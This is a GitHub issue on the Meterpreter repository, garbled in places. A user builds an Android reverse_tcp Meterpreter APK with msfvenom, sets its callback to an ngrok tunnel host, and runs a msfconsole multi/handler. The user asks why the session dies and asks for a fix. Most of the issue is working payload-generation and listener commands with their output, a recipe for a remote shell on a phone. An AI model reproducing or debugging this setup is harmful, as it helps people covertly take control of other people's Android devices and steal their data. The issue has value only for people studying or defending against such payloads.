rapid7/meterpreter

Season closed reason:dead

arshkiller opened this issue · 3 comments

$ msfvenom -p android/meterpreter/reverse_tcp lhost=0.tcp.ngrok.io lport=17629 R > /sdcard/666.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 10189 bytes

$ msfconsole

Metasploit Park, System Security Interface
Version 4.0.5, Alpha E
Ready...

access security
access: PERMISSION DENIED.
access security grid
access: PERMISSION DENIED.
access main security grid
access: PERMISSION DENIED....and...
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!

   =[ metasploit v5.0.94-dev                          ]
  • -- --=[ 2034 exploits - 1102 auxiliary - 344 post ]
  • -- --=[ 562 payloads - 45 encoders - 10 nops ]
  • -- --=[ 7 evasion ]

Metasploit tip: Metasploit can be configured at startup, see msfconsole --help to learn more

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost localhost
lhost => localhost
msf5 exploit(multi/handler) > set lport 4444
lport => 4444
msf5 exploit(multi/handler) > exploit

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[] Started reverse TCP handler on 127.0.0.1:4444
[
] Sending stage (73742 bytes) to 127.0.0.1
[] 127.0.0.1 - Meterpreter session 1 closed. Reason: Died
[
] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:42757) at 2020-07-04 11:32:04 +0530

This means a TCP connection was established successfully but the stager failed preventing the session from being established.

Then what should I do?

Is there any new command for that???

Plzz help me